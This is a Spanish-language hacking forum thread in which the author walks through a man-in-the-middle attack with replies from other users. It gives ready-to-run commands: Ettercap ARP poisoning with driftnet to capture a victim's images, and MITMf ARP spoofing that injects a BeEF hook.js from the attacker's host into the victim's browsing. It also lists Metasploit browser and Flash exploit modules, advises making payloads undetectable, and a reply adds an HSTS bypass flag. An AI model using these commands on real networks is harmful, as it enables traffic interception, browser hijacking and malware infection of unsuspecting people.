MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet, Mayo 23, 2016, 05:41:28 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 23, 2016, 05:41:28 PM Ultima modificación: Mayo 24, 2016, 02:01:59 AM por BrowserNet


Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:



cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento. 



Listado de red lo puedo ver en "Hosts" >> Hosts List



la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.



Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":



ahora daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

Código: php
 root@kali:~# driftnet -i eth0




Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:



Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:



Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Segundo escenario MITMF

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.
Código: php

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev




Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:
Código: php

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt




Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

Código: php
root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.



entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.



al momento que la victima entre nosotros en primer plano tendremos los datos DNS:



Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.



Aqui unos metodos de explotacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:





auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill
exploit/multi/browser/adobe_flash_shader_job_overflow

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

root@kali:~# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)




de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Diferentes técnicas para crear tus payload:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muy buen post ! La primer parte la conocía, la segunda no tanto, pero muy lindo aporte, se agradece !

Saludos !


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta, en las paginas con https también sirve?

Lo tienes muy complicado, pero investiga sobre SSL Strip.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta, en las paginas con https también sirve?

Intenta agregando --hsts

Código: text
mitmf --hsts --spoof --arp -i INTERFACE --gateway 192.168.1.1 --inject --js-url http://192.168.1.100:3000/hook.js


Aparte te aconsejo tener la version de Twisted 15.5.0

Código: text
pip install Twisted==15.5.0
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buenísimo aporte, se nota tu esfuerzo.
Sigue así, ayudas bastante en el aprendizaje.